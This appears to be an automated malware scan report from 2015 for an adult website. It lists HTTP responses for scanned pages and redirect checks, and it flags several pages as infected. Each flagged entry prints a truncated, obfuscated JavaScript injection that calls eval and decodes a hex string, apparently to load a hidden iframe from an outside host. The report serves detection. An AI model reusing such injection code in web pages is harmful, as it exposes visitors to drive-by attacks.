Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=nudegym.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://nudegym.net/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 25 Feb 2015 22:38:18 GMT Location: http://www.nudegym.net/ Server: Apache Content-Length: 231 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.nudegym.net/ | 200 OK Content-Length: 21080 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) bv=(5-3-1);aq="0"+"x";sp="spli"+"t";w=window;ff=String;z="dy";try{--document["\x62o"+z]}catch(d21vd12v){vzs=false;try{document;}catch(wb){vzs=152;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5d,68,63,5f,67,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,5d,68,63,5f,67,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,58,59,5c,71,5e,58,6c,71,24,5e,5c,65,5c,58,63,66,5e, Antivirus reports:
| ||
http://s10.histats.com/js9.js | 200 OK Content-Length: 7417 Content-Type: text/javascript | clean |
http://nudegym.net/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 25 Feb 2015 22:38:20 GMT Location: http://www.nudegym.net/test404page.js Server: Apache Content-Length: 245 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.nudegym.net/test404page.js | 404 Not Found Content-Length: 21080 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) bv=(5-3-1);aq="0"+"x";sp="spli"+"t";w=window;ff=String;z="dy";try{--document["\x62o"+z]}catch(d21vd12v){vzs=false;try{document;}catch(wb){vzs=152;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5d,68,63,5f,67,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,5d,68,63,5f,67,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,58,59,5c,71,5e,58,6c,71,24,5e,5c,65,5c,58,63,66,5e, Antivirus reports:
| ||
http://www.nudegym.net/fp | HTTP/1.1 302 Found Connection: close Date: Wed, 25 Feb 2015 22:38:21 GMT Location: http://join.pornprosnetwork.com/track/MTk4Nzo5NDoxMA/sites/?site=49 Server: Apache Content-Length: 251 Content-Type: text/html; charset=iso-8859-1 | clean |
http://join.pornprosnetwork.com/track/mtk4nzo5ndoxma/sites/?site=49 | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Wed, 25 Feb 2015 22:38:21 GMT Pragma: no-cache Location: http://www.pornprosnetwork.com/tours/2/ Server: Apache Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=027e06160b4faa6b3a37297ffdd1bc1d; path=/ X-Powered-By: PHP/5.2.9 | clean |
http://www.pornprosnetwork.com/tours/2/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 25 Feb 2015 22:38:22 GMT Location: http://pornprosnetwork.com/tours/2/ Server: nginx/0.8.54 Content-Length: 185 Content-Type: text/html Set-Cookie: RNLBSERVERID=ded641; path=/ | clean |
http://pornprosnetwork.com/tours/2/ | 200 OK Content-Length: 25645 Content-Type: text/html | clean |
http://pornprosnetwork.com//a.agvzvwof.com/ppdn.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: private, max-age=0, must-revalidate Connection: close Date: Wed, 25 Feb 2015 22:38:23 GMT Pragma: no-cache Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://join.pornpros.com/track/MDowOjk/?tour=tour1 Server: nginx/0.8.54 Content-Length: 116 Content-Type: text/html; charset=utf-8 Set-Cookie: uid=AAAAAN9O7lRse6jBAWPgAw==; path=/ Set-Cookie: RNLBSERVERID=ded3787; path=/ Status: 301 Moved Permanently X-Cache: MISS X-Runtime: 0.006648 X-UA-Compatible: IE=Edge,chrome=1 X-Varnish: 1832150580 | clean |
http://join.pornpros.com/track/mdowojk/?tour=tour1 | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Wed, 25 Feb 2015 22:38:23 GMT Pragma: no-cache Location: http://www.pornpros.com Server: Apache Content-Length: 0 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=d42b7aaee35d982427a6d87d20c535b9; path=/ X-Powered-By: PHP/5.2.9 | clean |
http://www.pornpros.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 25 Feb 2015 22:38:24 GMT Location: http://pornpros.com/ Server: nginx/0.8.54 Content-Length: 185 Content-Type: text/html Set-Cookie: RNLBSERVERID=ded3787; path=/ | clean |
http://pornpros.com/ | 200 OK Content-Length: 31861 Content-Type: text/html | clean |
http://pornpros.com//a.agvzvwof.com/ppdn.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: private, max-age=0, must-revalidate Connection: close Date: Wed, 25 Feb 2015 22:38:25 GMT Pragma: no-cache Via: 1.1 varnish Accept-Ranges: bytes Age: 0 Location: http://join.pornpros.com/track/MDowOjk/?tour=tour1 Server: nginx/1.2.1 Content-Length: 116 Content-Type: text/html; charset=utf-8 Set-Cookie: uid=AAAAAOFO7lTOKiomAaznAA==; path=/ Set-Cookie: RNLBSERVERID=ded655; path=/ Status: 301 Moved Permanently X-Cache: MISS X-Runtime: 0.009905 X-UA-Compatible: IE=Edge,chrome=1 X-Varnish: 2080227330 | clean |
http://join.pornpros.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://assets.pornprosmedia.com/assets/dark.js?1424902664 | 200 OK Content-Length: 198158 Content-Type: application/x-javascript | clean |
http://www.nudegym.net/scripts/jsuri-1.1.1.min.js | 404 Not Found Content-Length: 21080 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) bv=(5-3-1);aq="0"+"x";sp="spli"+"t";w=window;ff=String;z="dy";try{--document["\x62o"+z]}catch(d21vd12v){vzs=false;try{document;}catch(wb){vzs=152;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5d,68,63,5f,67,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,5d,68,63,5f,67,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,58,59,5c,71,5e,58,6c,71,24,5e,5c,65,5c,58,63,66,5e, Antivirus reports:
| ||
http://www.nudegym.net/scripts/jquery.min.js | 404 Not Found Content-Length: 21080 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) bv=(5-3-1);aq="0"+"x";sp="spli"+"t";w=window;ff=String;z="dy";try{--document["\x62o"+z]}catch(d21vd12v){vzs=false;try{document;}catch(wb){vzs=152;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5d,68,63,5f,67,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,5d,68,63,5f,67,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,58,59,5c,71,5e,58,6c,71,24,5e,5c,65,5c,58,63,66,5e, Antivirus reports:
| ||
http://www.nudegym.net/scripts/jquery.cookies.min.js | 404 Not Found Content-Length: 21080 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) bv=(5-3-1);aq="0"+"x";sp="spli"+"t";w=window;ff=String;z="dy";try{--document["\x62o"+z]}catch(d21vd12v){vzs=false;try{document;}catch(wb){vzs=152;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5d,68,63,5f,67,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,5d,68,63,5f,67,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,58,59,5c,71,5e,58,6c,71,24,5e,5c,65,5c,58,63,66,5e, Antivirus reports:
| ||
http://www.nudegym.net/scripts/cookie.js | 404 Not Found Content-Length: 21080 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) bv=(5-3-1);aq="0"+"x";sp="spli"+"t";w=window;ff=String;z="dy";try{--document["\x62o"+z]}catch(d21vd12v){vzs=false;try{document;}catch(wb){vzs=152;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5d,68,63,5f,67,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,5d,68,63,5f,67,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,58,59,5c,71,5e,58,6c,71,24,5e,5c,65,5c,58,63,66,5e, Antivirus reports:
| ||
http://www.nudegym.net/scripts/flowplayer-3.2.6.min.js | 404 Not Found Content-Length: 21080 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) bv=(5-3-1);aq="0"+"x";sp="spli"+"t";w=window;ff=String;z="dy";try{--document["\x62o"+z]}catch(d21vd12v){vzs=false;try{document;}catch(wb){vzs=152;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5d,68,63,5f,67,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,5d,68,63,5f,67,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,58,59,5c,71,5e,58,6c,71,24,5e,5c,65,5c,58,63,66,5e, Antivirus reports:
| ||
http://www.nudegym.net/scripts/jquery.google-analytics.js | 404 Not Found Content-Length: 21080 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) bv=(5-3-1);aq="0"+"x";sp="spli"+"t";w=window;ff=String;z="dy";try{--document["\x62o"+z]}catch(d21vd12v){vzs=false;try{document;}catch(wb){vzs=152;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5d,68,63,5f,67,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,5d,68,63,5f,67,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,58,59,5c,71,5e,58,6c,71,24,5e,5c,65,5c,58,63,66,5e, Antivirus reports:
| ||
http://www.nudegym.net/scripts/ICanHaz.min.js | 404 Not Found Content-Length: 21080 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) bv=(5-3-1);aq="0"+"x";sp="spli"+"t";w=window;ff=String;z="dy";try{--document["\x62o"+z]}catch(d21vd12v){vzs=false;try{document;}catch(wb){vzs=152;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5d,68,63,5f,67,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,5d,68,63,5f,67,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,58,59,5c,71,5e,58,6c,71,24,5e,5c,65,5c,58,63,66,5e, Antivirus reports:
| ||
http://fuckyoucash.com/natsinator/assets/javascripts/jquery.cookies.min.js | 200 OK Content-Length: 5498 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: nudegym.net
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 25 Feb 2015 22:38:18 GMT
Location: http://www.nudegym.net/
Server: Apache
Content-Length: 231
Content-Type: text/html; charset=iso-8859-1
...231 bytes of data.
GET / HTTP/1.1
Host: nudegym.net
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 25 Feb 2015 22:38:18 GMT
Location: http://www.nudegym.net/
Server: Apache
Content-Length: 231
Content-Type: text/html; charset=iso-8859-1
...231 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: nudegym.net
Referer: http://www.google.com/search?q=nudegym.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: nudegym.net
Referer: http://www.google.com/search?q=nudegym.net
Result:
The result is similar to the first query. There are no suspicious redirects found.